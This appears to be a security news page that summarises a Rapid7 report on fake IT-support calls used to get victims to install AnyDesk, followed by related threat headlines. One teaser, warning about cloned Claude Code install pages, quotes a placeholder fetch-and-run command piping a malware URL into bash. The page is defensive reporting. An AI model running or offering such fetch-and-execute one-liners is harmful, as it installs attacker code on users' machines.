On June 20, 2024, Rapid7 identified multiple intrusion attempts by threat actors utilizing techniques, tactics, and procedures (TTPs) that are consistent with an ongoing social engineering campaign being tracked by Rapid7.
The initial lure being utilized by the threat actors remains the same: an email bomb followed by an attempt to call impacted users and offer a fake solution. In the recent cases handled by Rapid7, external calls were typically made to the impacted users via Microsoft Teams. Once on the phone, the threat actor would convince the user to download and install AnyDesk, a popular remote access tool that allows the threat actor to take control of the user’s computer.
Read more…
Source: Rapid7
Related:
- Fake Claude Code install pages hit Windows and Mac users with infostealers
March 9, 2026
Attackers are cloning install pages for popular tools like Claude Code and swapping the “one‑liner” install commands with malware, mainly to steal passwords, cookies, sessions, and access to developer environments. Modern install guides often tell you to copy a single command like curl https://malware-site | bash into your terminal and hit Enter. That habit turns the ...
- Russian cybercrims phish their way into officials’ Signal and WhatsApp accounts
March 9, 2026
Russian-linked hackers are trying to break into the Signal and WhatsApp accounts of government officials, journalists, and military personnel globally – not by cracking encryption, but by simply tricking people into handing over the keys. That’s the warning issued Monday by the Netherlands’ intelligence and military security agencies, the AIVD and MIVD, which say a “large-scale” ...
- Cisco warns of two more SD-WAN bugs under active attack
March 6, 2026
Just when network admins thought the Cisco SD-WAN patch queue might finally be shrinking, Switchzilla has confirmed miscreants are exploiting more vulnerabilities in its SD-WAN management software. The newly abused flaws affect Cisco Catalyst SD-WAN Manager, the platform formerly known as vManage that sits at the center of many organizations’ SD-WAN deployments. One of the bugs, ...
- Securing ambient AI in healthcare: governance is the new front line
March 5, 2026
Ambient AI is no longer experimental. It’s live. From AI-powered clinical documentation assistants to remote monitoring systems and intelligent patient engagement agents, healthcare organizations are embedding AI directly into care delivery. The promise is compelling: less administrative burden, faster insights, and more time with patients. But as AI enters clinical workflows, a more urgent question emerges: ...
- New BoryptGrab Stealer Targets Windows Users via Deceptive GitHub Pages
March 5, 2026
Trend Micro researchers recently found the existence of a new stealer binary that collects browser and cryptocurrency wallet data, system information, and common files, among others. The researchers designated this new stealer BoryptGrab. Certain variants of the stealer can download a PyInstaller backdoor, which Trend Micro refer to as TunnesshClient. TunnesshClient establishes a reverse Secure Shell ...
- Microsoft warns of new signed malware which deploys remote monitoring tools as backdoors
March 5, 2026
Microsoft is warning of a new phishing campaign which aims to deploy persistent backdoors to victim’s computers. In a new in-depth analysis, the company’s researchers said they recently spotted multiple phishing campaigns, currently not attributed to any known threat actors, which send out emails with weaponized PDF files (financial documents, invoices), fake meeting invitations, or organizational ...